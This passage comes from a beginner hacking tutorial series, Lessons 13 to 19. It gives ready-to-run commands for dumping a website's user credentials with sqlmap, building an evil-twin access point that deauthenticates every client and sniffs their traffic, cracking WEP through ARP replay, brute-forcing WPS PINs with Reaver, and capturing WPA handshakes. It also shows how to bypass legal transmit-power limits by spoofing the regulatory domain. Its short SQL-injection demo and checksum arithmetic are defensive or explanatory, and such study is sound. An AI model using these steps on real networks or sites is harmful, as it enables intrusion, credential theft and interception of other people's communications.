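from step 1 and a parameterised query that cannot be injected."""
import sqlite3
from typing import List


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a Users table like the one in the tutorial."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(105, "srinivas", "s3cret"), (106, "john", "test"), (107, "alice", "hunter2")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """The vulnerable pattern: the URL parameter is pasted into the SQL text,
    so whatever the user typed is parsed as part of the query."""
    query = f"SELECT Name FROM Users WHERE UserId = {user_id}"
    return [row[0] for row in conn.execute(query)]


def probe_for_error(conn: sqlite3.Connection, user_id: str) -> bool:
    """Step 1 of the tutorial: does a malformed value make the database throw
    an error? True means the input reaches the SQL parser unfiltered."""
    try:
        lookup_vulnerable(conn, user_id)
    except sqlite3.Error:
        return True
    return False


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """The fix: validate the type, then bind the value as a parameter.
    A bound value is never interpreted as SQL, so `or 1=1` cannot change
    the query's logic; here it does not even pass the int() check."""
    uid = int(user_id)  # raises ValueError for "105 or 1=1"
    rows = conn.execute("SELECT Name FROM Users WHERE UserId = ?", (uid,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    print("normal   :", lookup_vulnerable(db, "105"))        # ['srinivas']
    print("probe    :", probe_for_error(db, "105'"))          # True: syntax error leaks
    print("injected :", lookup_vulnerable(db, "105 or 1=1"))  # every user
    print("safe     :", lookup_safe(db, "105"))               # ['srinivas']
    try:
        lookup_safe(db, "105 or 1=1")
    except ValueError as exc:
        print("safe rejects injection:", exc)
```

The stray quote in the probe ("105'") is the same trick sqlmap starts with: if the page shows a database error for it, the parameter is worth attacking. Note that the safe version is safe because of the bound parameter, not because of the int() check alone; for text columns you cannot validate your way out, and binding is the control that matters.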
That's it for this tutorial, you now know how SQL Injections work. It might be worth
your time learning some SQL on W3schools till I come up with some other tutorial.
Lesson 13: More SQLMap
Hacking Websites Using Sqlmap in Kali linux
Sql Version
Boot into your Kali Linux machine. Start a terminal and type sqlmap -h
It lists the basic options supported by sqlmap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>
In our case it will be
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes the --time-sec option helps, especially when the server's responses are slow. It sets how many seconds sqlmap waits for a time-based blind injection to show itself (the default is 5), so raising it makes detection on a slow server more reliable, at the cost of a slower run.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either way, when sqlmap is done it will tell you the MySQL version and some other useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have to be answered with yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across:

Some message saying that the back-end DBMS is probably MySQL, so should sqlmap skip all other tests and conduct MySQL-specific tests only. Your answer should be yes (y).
Some message asking whether or not to include payloads for specific versions of MySQL. The answer depends on the situation. If you are unsure, it's usually better to say yes.
Enumeration
Database
In this step we will obtain database names, table names, column names and other useful data from the database.
List of a few common enumeration commands
So first we will get the names of the available databases. For this we add --dbs to our previous command. The final command will look like
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
So the two databases are acuart and information_schema.
Table
Now we are obviously interested in the acuart database. information_schema is a built-in database present on every MySQL server (5.0 and later) that holds metadata about the structure of the databases, tables and columns, but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So now we will specify the database of interest using -D and tell sqlmap to list its tables using --tables. The final sqlmap command will be
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this:
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of
columns.
Columns
Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the usernames and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this-
Data
Now, if you were following along attentively, you'd expect us to get data from one of the columns next. That isn't wrong, but it's time to go one step further: we will get data from multiple columns at once. As usual, we specify the database with -D, the table with -T, and the columns with -C, separating multiple column names with commas, and we ask for the contents of those columns with --dump. The final command will look like this:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
Here's the result
John Smith, of course. And the password is test. The email address isn't anything interesting either. Okay, nothing great, but in real-world web pentesting you can come across far more sensitive data. Under such circumstances, the right thing to do is to mail the admin of the website and tell them to fix the vulnerability ASAP. Don't get tempted to join the dark side; you don't look pretty behind bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up.
Lesson 14: Evil Twin
Evil Twin Tutorial
You will also need to install a tool (bridge-utils) which doesn't come pre-installed in Kali. No big deal:
apt-get install bridge-utils
Objectives
The whole process can be broken down into the following steps:
1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng to put the card in monitor mode, airodump-ng to find the necessary info about the network, and airbase-ng to create its twin.
2. Forcing the client to disconnect from the real AP and connect to yours. We'll use aireplay-ng to deauthenticate the client, and a stronger signal to make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to our client.
4. Have fun: monitor traffic from the client, maybe hack into his computer using Metasploit.
PS: The first 3 are primary objectives; the last one is optional and not part of the evil twin attack as such. It is rather a man-in-the-middle attack.
[Picture not reproduced; credit: firewalls.com]
Information Gathering - airmon-ng
To see available wireless interfaces:
iwconfig
To start monitor mode on the available wireless interface (say wlan0):
airmon-ng start wlan0
To capture packets from the air on the monitor-mode interface (mon0):
airodump-ng mon0
Note: older aircrack-ng releases, as on the Kali used here, name the monitor interface mon0; aircrack-ng 1.2 and later name it wlan0mon instead, so substitute whatever airmon-ng reports.
After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.
Creating the twin
Now we will use airbase-ng to create the twin network of one of the networks that
showed up in the airodump-ng list. Remember, you need to have a client connected to
the network (this client will be forced to disconnect from that network and connect to
ours), so choose the network accordingly. Now after you have selected the network,
take a note of its ESSID and BSSID, and replace them in the given code:
airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>
If you face any problems, a shorter version is:
airbase-ng --essid <name of network> mon0
Remove the angle brackets (< and >) and choose any channel that you want. The BSSID can also be chosen at random and doesn't have to match the target. The interface would be mon0 (or whichever card you want to use). The only thing that has to be identical about the twins is their ESSID (the name of the network). However, it is better to keep all parameters the same to make it look more real. One caveat: airbase-ng as used here creates an open (unencrypted) AP, and most clients that were configured for a WPA/WPA2 network will not automatically join an open network of the same name, so this works best against open networks or a user who manually picks the network. After you are done entering the parameters and running the command, you'll see that airbase-ng has turned your wireless adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure
you have a method of connecting to the net other than wireless internet, because your
card will be busy acting like an AP, and won't be able to provide you with internet
connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G
internet.
[Picture not reproduced: man-in-the-middle attack diagram; credit: owasp.net]
Telling the client to get lost
Now we have to ask the client to disconnect from that AP. Our twin won't work if the
client is connected to the other network. We need to force it to disconnect from the
real network and connect to the twin.
For this, the first part is to force it to disconnect. aireplay-ng will do that for us:
aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one
The 0 after --deauth is the number of deauthentication bursts to send; 0 means keep sending them indefinitely, 1 would mean send a single burst, 2 two bursts, and so on. If you keep it at 0, your client will be disconnected in a matter of seconds, so fire up the command and press ctrl+c after a few seconds. Note that without a client address the deauth is sent to the broadcast address, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible by adding -c <client MAC>.
Not the real one, but why the fake one
Even after being disconnected from the real AP, the client may keep trying to reconnect to the same AP a few more times instead of trying ours. We need to make our AP stand out, and for that we need more signal strength. There are two ways to do that:
1. Physically move closer to the client.
2. Power up your wireless card to transmit at more power.
The latter can be done with the following command:
iwconfig wlan0 txpower 27
Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support up to 30 dBm, but many countries don't allow the card to transmit at such power; try changing 27 to 30 and you'll see what I mean. In Bolivia, however, 30 dBm is permitted, and by changing the regulatory domain we can overcome the power limitation:
iw reg set BO
iwconfig wlan0 txpower 30
It is strongly advised not to break the law: the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal is stronger than that of the real twin.
Note : If you are unable to get your client to connect to you, there is another
option. You can leave him with no options. If you keep transmitting the deauth
packets continuously (i.e. don't press ctrl+c after the client has disconnected), he
will have no choice but to connect to you. However, this is quite an unstable
situation, and the client will go back to the real twin as soon as it gets the chance.
Give the fake AP internet access
Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial we will assume that we have an interface x0 which has internet connectivity. If you are connected to the net via wireless, replace x0 with wlan1 or wlan0; a 3G modem will show up as ppp0. In any case, you just have to know which interface is providing you with internet, and you can route the internet access to your client.
Interfaces
x0 - This has internet access.
at0 - This is created by airbase-ng (the wired, tap side of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can reach the net.
evil - This is an interface that we will create, whose job will be to actually bridge the two networks.
Creating evil
We will use the bridge control utility from bridge-utils, brctl. Execute the following:
brctl addbr evil
This will create the bridge. Now we have to specify which two interfaces have to be bridged:
brctl addif evil x0
brctl addif evil at0
We clear the IPs of the member interfaces and bring them up using
ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
Also bring up the evil interface (the interfaces aren't always up by default, so we have to do this many times):
ifconfig evil up
Now, to auto-configure all the complicated DHCP settings, we'll use dhclient (on the Kali version used here the binary may be called dhclient3):
dhclient evil &
Finally, all the configuration is done. You can execute ifconfig and see the results, which will show you all the interfaces you have created.
Caveat: bridging works when x0 is a wired (or USB-modem) interface. If x0 is itself a Wi-Fi client interface, most drivers will not forward frames from other MAC addresses through it, so the bridge silently passes nothing; in that case use NAT (enable ip_forward and add an iptables MASQUERADE rule on x0) instead of a bridge.
Officially, the evil twin attack is complete. The client is now connected to your fake network and can use the internet pretty easily, with nothing obvious to tell him what went wrong. However, the last objective remains.
Have fun
Now that the client is using the internet via our evil interface, we can do some evil
stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a
detailed tutorial for it later. However, for the time being, I will give you some idea
what you can do.
Sniffing using Wireshark
Now all the packets that go from the user to the internet pass through our evil interface, and these packets can be monitored with Wireshark (capture on evil or at0). I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea of how to use Wireshark. Pic credits: the picture on the right was taken directly from their website.
http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html
Lesson 15: Ad-Hoc Networks (Pentesting yourself the
legal way)
Create A Wireless Ad-Hoc Network on
Windows 8 Using command line
For the hackers
This method works on Windows 7 and later, provided your driver supports it (step 3 below checks). Windows calls it a hosted network; it is really a software access point rather than a true ad-hoc network, but for practice it behaves like any WPA2-PSK router. This article is relevant and important here since the best way to start with hacking is to practise on yourself. You are going to need two adapters for this task: one on Windows which will create the network, and another on Kali Linux which will hack the network. This article concentrates only on the former part of the exercise, and we'll only create the network here. So non-hackers too can follow from here on.
For everyone
1. Get access to an elevated command prompt (with administrator privileges). [On Windows 8: press Windows key + X, or hover your mouse at the lower-left corner of the screen and right-click, then click "Command Prompt (Admin)".]
2. Now type
netsh wlan show drivers
3. If "Hosted network supported" says Yes, move on to the next step.
4. Now type
netsh wlan set hostednetwork mode=allow ssid=<enter_network_name_here> key=<enter_password_here>
(the key must be 8 to 63 characters, since the hosted network always uses WPA2-PSK).
5. Finally type
netsh wlan start hostednetwork
Your network is ready.
Lesson 16: Creating a dummy Wi-Fi network for
pentesting
Creating A dummy wifi for hacking
What you'll need
At least 2 wireless adapters. I've got three. First one is the internal adapter which came
with my laptop. The other 2 are DLink adapters.
[Pictures not reproduced: my D-Link adapter, and the adapter list on my Windows machine (names blurred; it's a sort of convention, I guess).]
What now
Now since we have multiple adapters, we can use one of them to create a wireless
network on Windows and then practice hacking it on a virtual Kali Linux machine.
This is our newly created network. Now we can turn on our Kali machine and see if it
is discovered there.
So it showed up pretty fine. Note that a Windows hosted network always uses WPA2-PSK (AES); netsh cannot switch it to WEP or WPA-TKIP, so for practising WEP cracking you'll need a router that can be set to WEP. WPA2 handshake capture and dictionary attacks can be practised on this dummy network as it is.
Lesson 17: Speeding up WEP Hacking in Kali Linux
Speeding Up WEP Hacking In Kali
Now if you have followed the basic WEP hacking tutorial, then you are ready to
proceed to the stage where you follow an intermediate level hacking tutorial. In this
tutorial, we will look at the intricate details of what is happening and approach the
complicated methods and concepts.
To start with, I'll address a common question
14 March 2014 19:28
I couldn't find any wlan when I write ifconfig in the terminal.
1. Are you using Kali Linux on a virtual machine? Please note that a wireless adapter can only be used by one machine at a time. Your host machine has access to the wireless adapter, not the virtual machine. This question has been discussed at length on the superuser forums. The conclusion is that you can't directly connect an internal wifi card using any virtual machine software:
"Unfortunately no virtualization software allows for direct access to hardware devices like that. Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those programs behave the same way. The only devices that can be directly accessed are usb devices. Everything else is abstracted through the virtualization engine. (Though you could argue that the vm has lower level access to cd rom's and storage devices). I wish I could give you a better answer, than simply to buy a usb wireless card."
Basically you have to buy an external wireless card. They aren't very expensive. I personally use two of them myself. If you want to see what I use, take a look here:
http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-hacking.html
So basically you have 2 choices. First, you can buy a new external USB wireless adapter (no referral links here). Secondly, you can install Kali alongside Windows or run it from a USB stick. A virtual machine can only use a wireless adapter if it is externally connected via USB and passed through to the VM. Now there is another catch here. Many internal adapters (or rather their drivers) don't support packet injection, which is essential for speeding up wireless hacking. So if you really want to go in depth into wireless hacking, it's time to buy an external adapter or two (the more the better). If that's not a possibility, you might want to spend hours trying to get a driver which might make your internal adapter support injection (I don't know anyone who succeeded in this, but it might be possible).
Kali Linux
I don't know why it needs mention here, but still, if you don't have Kali Linux (or
Backtrack) installed yet, you will have to install it before you can start this tutorial.
Check Injection Support
Aircrack-ng has a comprehensive article on checking injection support; you might check their website for it. I am just providing the commands which will be enough to find out whether injection is working or not.
airmon-ng start wlan0 [or wlan1]
(Puts your wireless adapter in monitor mode. From now on we'll refer to the monitor interface created from wlan0/wlan1 as mon0.)
airserv-ng -d mon0
aireplay-ng -9 127.0.0.1:666
The first command sets up a temporary server on your own machine that exposes the card over the network and waits for you to test your injection capabilities. The second command runs the injection test (-9) through that server. 127.0.0.1 is the IP reserved for loopback; it is always used when you are carrying out a command against yourself. 666 is the port we are using (airserv-ng's default). Most of the time, what follows an IP and a colon is the port; the general form is IP:port. So finally you have checked your injection capabilities, and the last line, "Injection is working!", should bring a smile to your face. If not, you'll have to buy a card which supports injection, or look at some forum posts which will help you figure something out.
Check Signal Strength
While the basic hacking methods from the previous post don't have any real strength
restriction, you need to be physically close to the access point in order to inject
packets. There is information regarding the same in the same aircrack-ng tutorial.
Again, I'm gonna summarize what you have to do here.
First we will use airodump-ng mon0 to see the list of networks in range. Pick the one you want to hack.
[Screenshot not reproduced: airodump-ng lists the networks in range.]
Now we will hack the DIGISOL network. Make a note of the BSSID of the network you want to hack. A good practice is to store all the information gathered in a text editor. We should, at this stage, take note of the following:
ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH (channel) - 2
MAC address of genuine users connected to the network:
Interface: wlan1 - referred to as mon0
You should gather the equivalent information for the network you will be working on, then just change the values whenever I use them in any of the commands.
Note: We need at least one user (wired or wireless) connected to the network and using it actively. The reason is that this tutorial depends on receiving at least one ARP request packet, and if there are no active clients there will never be any ARP request packets.
Now, to check whether the signal strength will be sufficient, we will simply execute the following:
airodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2
This will make the wireless card only read packets on channel 2, on which our target network is. Leave it running and, in another terminal, test the network with:
aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0
Last time we checked whether the wireless card had the capability to inject packets; we tested it against our own computer. This time we actually injected packets towards the target AP. If this worked, it's pretty good news, and it means that you are most probably going to be able to hack this network. The last line, 30/30: 100%, shows how many of the probe requests the AP answered, which is a measure of the link quality. A very high percentage is a good sign, and 100 is ideal.
Capture Packets
Now we have already run airodump-ng a couple of times. However, this time we will pass the -w option, which instructs airodump-ng to save the capture to a file.
airodump-ng -c [channel] --bssid [bssid] -w [file_name] [interface]
airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0
Now the output will be saved in a file dump-01.cap (the number increments each time you run the command with the same prefix).
Now we can keep this terminal running and it will keep saving the packets. [In the
previous tutorial we did only 2 things, capture the packet, i.e this step, and crack it,
i.e. the step we are going to do last. While it makes our work easier to just follow two
steps, it also makes the process much more time consuming, since we are simply a
passive packet listener, who is not doing anything]
Speeding Things Up
Fake Authentication
Now to speed things up, we will inject packets into the network. We will thus obtain ARP packets, which the AP re-encrypts and rebroadcasts, each time with a new IV. These packets fill up the #Data column of our airodump-ng capture, and that data is what will give us the key. As soon as we have around 10,000 data packets we can start attempting to recover the key using aircrack-ng; it keeps retrying as more IVs arrive, and in practice 64-bit keys typically need around 20,000 IVs and 128-bit keys considerably more.
Now, to make the AP pay attention to your injected packets, you either have to be a connected client or have to pretend to be one. You can either change your MAC address to that of an already connected client, or use the fake authentication feature. We will do the latter. (If you see an error like "the AP is on channel x and mon0 is on channel y", go to the bottom of the post for troubleshooting.)
aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0
Authenticated and capturing packets
ARP request replay mode
ARP packets are your best bet at getting a lot of IVs (data). Without enough IVs you can't crack the key. Enter the following to make aireplay-ng listen to the AP for ARP packets and re-inject them as soon as it finds one. This will create a lot of data very fast. This is the real speeding step.
aireplay-ng -3 -b [BSSID] mon0
This is what the final command will look like:
aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0
Now you'll have to wait for some time till it gets an ARP request. As soon as it gets one, the terminal will sort of explode, and the data packets will start filling in at Godspeed. This is the part where an active user on the network is absolutely necessary.
[Screenshots and video not reproduced: a slow start, then the #Data column filling in very fast once ARP injection began, until there were enough packets to crack almost any network.]
Cracking the network
Cracking the network is as easy as typing the following into the console
aircrack-ng name_of_file-01.cap
In our case, the command will be
aircrack-ng dump-01.cap
After pressing enter, you will have a list of networks and you'll be prompted to select
which one of them to hack. In my case there was just one network, so I couldn't get
that screen, or a screenshot. The password was cracked in less than a second.
I have blurred out the password and some random stuff.
So finally you have obtained the password of the network you were trying to hack.
Troubleshooting
A person commented on another wireless hacking post. This is the problem he faced.
whenever I try to use aireplay-ng with the options, it always fails saying that mon0 is on channel -1 and the target is on another channel. How can I fix this? I looked a lot for a real answer but nobody knows what this is.
This is a possible solution. Okay, try the following:
1) When you start monitor mode, specify the channel: airmon-ng start <interface> [channel or frequency]
Your command: airmon-ng start wlan0 6
Substitute 6 with the required channel.
2) While starting airodump-ng, specify the channel:
airodump-ng mon0 -c 6
I was facing this problem when my mon0 kept hopping from one channel to another, and the second step alone solved my problem. If your airmon-ng assigns itself a fixed channel of its own accord, without you even specifying it, then the problem might be more complicated; the usual cause is another process (a network manager or wpa_supplicant) still controlling the card, which airmon-ng check kill will stop. If the above steps don't solve the problem, take a look here:
http://ubuntuforums.org/showthread.php?t=1598930
Lesson 18: Hack WPA/WPA2 with WPS enabled
Hack WPA/WPA2 WPS - Reaver - Kali Linux
WPA/WPA-2
When it was known that a WEP network could be hacked by any kid with a laptop
and a network connection (using easy peasy tutorials like those on our blog), the
security guys did succeed in making a much more robust security measure
WPA/WPA2.
Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days and still might not succeed. Also, good dictionaries are huge. An exhaustive brute force including all the letters (uppercase and lowercase) and numbers may take years, depending on password length. Rainbow tables are known to speed things up by doing part of the guessing beforehand, but since WPA mixes the network name into the key a table only works for one SSID, and the tables that need to be downloaded are disastrously large (hundreds of GB sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for users to configure. With this in mind a new mechanism was introduced to complement WPA: Wi-Fi Protected Setup (WPS). It was meant to make WPA much easier to configure (push a button on the router and the device connects, or type an 8-digit PIN) without weakening it. However, it had a hole, which is now well known, and tools like reaver can exploit it with a one-line command. It still might take hours, but that is much better than the previous scenario in which months of brute-forcing would yield no result.
Here's what Wikipedia says about WPS:
"Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models."
Working Of WPS


Now while most of the things are the same as in WPA, there is a new concept of using
pins for authentication. So basically, the client sends 8 digit pins to the access point,
which verifies it and then allows the client to connect. Now a pin has 8 digits, and
only contains numbers, so its a possible target for bruteforece. Under normal
bruteforcing of WPA passwords, you have to consider the fact that there may be
number, alphabets, and sometimes symbols (and more than 8 letters). This make the
task a billion billion times tougher. However, we can try thousands of keys per
second, which make it a tad bit easier. Now in WPS, there is a delay because we have
to wait for APs response, and we may only try a few keys per second (practically the
best I've seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per
digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume
one key per second. Now that'll be years. So, where is this taking us? The answer is,
there are flaws in this technology that can be used against it.
The 8th digit is a checksum of the first 7 digits. 10^7 possibilities, i.e. one-tenth the time.
Two months, still a way to go.
The PIN for verification goes in two halves, so we can independently verify
the first four and the last four digits. And believe me, it's easier to guess 4 digits correctly
two times than to guess 8 correct digits at once. Basically, the first half would take
10^4 guesses and the second would take 10^3 (its last digit is the checksum, so only
three of its four digits are free).
Now the guesses would be 10^4 + 10^3 (not 10^4 * 10^3). Now we need 11,000
guesses.
So that'll take 3 hours approximately. And that's all the combinations, and most
probably the correct PIN will not be the last combination, so you can expect to reach
the result earlier. However, the assumption is that brute forcing will take place at a key
per second. My personal best is a key every 2 seconds, and yours might drop to as low
as a key every 10 seconds.
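To make the figures above concrete, here is an added example (not from the lesson and not Reaver's code) that computes the three search-space sizes and the hours at the three guess rates the text quotes, and checks the WPS PIN checksum the text mentions; the checksum rule is the one from the Wi-Fi Simple Configuration specification.

```python
# Added example: the PIN search-space arithmetic from the lesson, plus the
# WPS PIN checksum (weights 3,1,3,1,3,1,3 over the first seven digits; the
# eighth digit brings the weighted sum to a multiple of ten).

def wps_checksum(first_seven: int) -> int:
    """Check digit for a 7-digit WPS PIN prefix."""
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("prefix must be 7 decimal digits")
    digits = [int(d) for d in f"{first_seven:07d}"]
    total = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 decimal digits and the last one is the right checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def worst_case_guesses() -> dict:
    """Upper bound on PIN guesses under each model the lesson describes."""
    return {
        # eight free digits
        "naive": 10 ** 8,
        # the eighth digit is a checksum, so only seven are free
        "checksum": 10 ** 7,
        # the AP confirms each half separately, so the halves are searched
        # one after the other: 10^4 for the first, then 10^3 for the second
        # (whose last digit is the checksum)
        "split_halves": 10 ** 4 + 10 ** 3,
    }


def hours_to_exhaust(guesses: int, seconds_per_guess: float) -> float:
    """Worst-case wall-clock hours at a fixed rate; the expected time is about half."""
    return guesses * seconds_per_guess / 3600


def rate_table(seconds_per_guess_options=(1, 2, 10)) -> dict:
    """Hours to exhaust the split-half space at the rates quoted in the lesson."""
    n = worst_case_guesses()["split_halves"]
    return {s: round(hours_to_exhaust(n, s), 1) for s in seconds_per_guess_options}


if __name__ == "__main__":
    # The sample PIN from the lesson's Reaver run has a valid checksum.
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print("guesses:", worst_case_guesses())
    # The response rate (or a lockout after failed attempts) is the only term
    # in this calculation the AP owner controls; PIN length is fixed by the spec.
    print("hours at 1 / 2 / 10 s per guess:", rate_table())
```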
How to carry out the attack
Now it might have been tough to carry out this attack at some point in history, but
now, it's a breeze. If you have all the prerequisites, then hacking the network would be
as easy as
reaver -i <interface-name> -b <BSSID of target>
And if you are already familiar with hacking WEP, then just go to your Kali Linux
terminal and type the above command (replacing what needs to be replaced). Leave
your machine as is, come back 10 mins later, check the progress (it must be 1%
or something), and go take a nap. However, if you're a newbie, then tag along.
Kali Linux
First off, you need to have Kali Linux (or BackTrack) up and running on your machine.
Any other Linux distro might work, but you'll need to install Reaver on your
own. (Reaver has a known issue: sometimes it doesn't work with virtual machines,
and you might have to do a live boot using a live CD or live USB of Kali Linux. See the
last section of this post on troubleshooting by scrolling down a bit.)
Information Gathering
Now you need to find out the following about your target network:
1. Does it have WPS enabled? If not, then the attack will not work.
2. The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either
use wash or just use the good old airodump-ng. Wash is specifically meant to check
whether a network has WPS enabled or not, and thereby is much easier to use. Here
are the steps:
1. Set your wireless interface in monitor mode:
airmon-ng start wlan0
2. Use wash (easy but sometimes unable to detect networks even when they have WPS
enabled). If any network shows up there, it has WPS enabled.
wash -i mon0
This will show all the networks with WPS enabled.
This is an error which I haven't figured out yet. If you see it, then you'll have to do some homework, or move
on to the airodump method. Update: wash -i mon0 --ignore-fcs might solve the issue.
3. Use airodump-ng. It will show all networks around you. It tells which of them use
WPA. You'll have to assume they have WPS, and then move to the next steps.
airodump-ng mon0
None of them has WPS enabled, just saying.
BSSID of the network - Now irrespective of what you used, you should have a
BSSID column in the result that you get. Copy the BSSID of the network you want to
hack. That's all the information you need.
So by now you must have something like XX:XX:XX:XX:XX:XX, which is the
BSSID of your target network. Keep this copied, as you'll need it.
Reaver
Now finally we are going to use Reaver to get the password of the WPA/WPA2
network. Reaver makes hacking very easy, and all you need to do is enter
reaver -i mon0 -b XX:XX:XX:XX:XX:XX
Explanation: -i is the interface used. Remember creating a monitor interface mon0 using
airmon-ng start wlan0. This is what we are using. -b specifies the BSSID of the network
that we found out earlier.
This is all the information that Reaver needs to get started. However, Reaver comes
with many advanced options, and some are recommended by me. Most importantly,
you should use the -vv option, which increases the verbosity of the tool. Basically, it
writes everything that's going on to the terminal. This helps you see what's happening,
track the progress, and if needed, do some troubleshooting. So the final command should
be
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
After some hours, you will see something like this. The pin in this case was
intentionally 12345670, so it was hacked in 3 seconds.
Here is an extra section, which might prove useful (or more like consoling, to let you
know you are not the only one who is having troubles)
Known problems that are faced - Troubleshooting
1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6".
(Yours will be mon0 instead of wlan0). Sometimes, it keeps switching
interfaces forever.
2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for
beacon frame stage.
3. Sometimes it never associates with the target AP.
4. Sometimes the response is too slow, or never comes, and a (0x02) or something
error is displayed.
In most cases, such errors suggest:
1. Something wrong with the wireless card.
2. AP is very choosy, won't let you associate.
3. The AP does not use WPS.
4. You are very far from the AP.
Possible workarounds:
1. Sometimes, killing naughty processes helps. (see pictures below)
2. Move closer to the target AP.
3. Do a fakeauth using aireplay-ng (check speeding up WEP hacking) and tell
Reaver not to bother as we are already associated using -A (just add -A at the
end of your normal reaver command).
4. If you are using Kali Linux in VMware, try booting into Kali using USB. I don't
know why, but sometimes internal adapters work wonders, and can't be used
from inside of a VM. In my case, booting up from USB and using the internal
adapter increased the signal strength and sped up the brute force
process. Update: it has nothing to do with the internal adapter. I have verified
my observation with various hackers, and it is now a known problem with
Reaver. It does not work well inside virtual machines. It is recommended
that you do a live boot.
processes causing problems
Kill 'em all
Lesson 19: Hack WPA-2 PSK Capture Handshake
Hack WPA-2 PSK Capturing the Handshake
WPA password hacking
Okay, so hacking WPA-2 PSK involves 2 main steps:
1. Getting a handshake (it contains the hash of the password, i.e. encrypted password)
2. Cracking the hash.
Now the first step is conceptually easy. What you need is you, the attacker, a client
who'll connect to the wireless network, and the wireless access point. What happens is
when the client and access point communicate in order to authenticate the client, they
have a 4-way handshake that we can capture. This handshake has the hash of the
password. Now there's no direct way of getting the password out of the hash, and thus
hashing is a robust protection method. But there is one thing we can do. We can take
all possible passwords that can exist, and convert them to hashes. Then we'll match the
hash we created with the one that's there in the handshake. Now if the hashes match,
we know what plain text password gave rise to the hash, thus we know the password.
If the process sounds really time consuming to you, then it's because it is. WPA
hacking (and hash cracking in general) is a pretty resource intensive and time consuming
process. Now there are various ways cracking of WPA can be done. But
since WPA is a long shot, we shall first look at the process of capturing a handshake.
We will also see what problems one can face during the process (I'll face the problems
for you). Also, before that, some optional Wikipedia theory on what a 4-way
handshake really is (you don't want to become a script kiddie, do you?)
The Four-Way Handshake
The authentication process leaves two considerations: the access point (AP) still needs
to authenticate itself to the client station (STA), and keys to encrypt the traffic need to
be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret
key PMK (Pairwise Master Key). This key is, however, designed to last the entire
session and should be exposed as little as possible. Therefore the four-way handshake
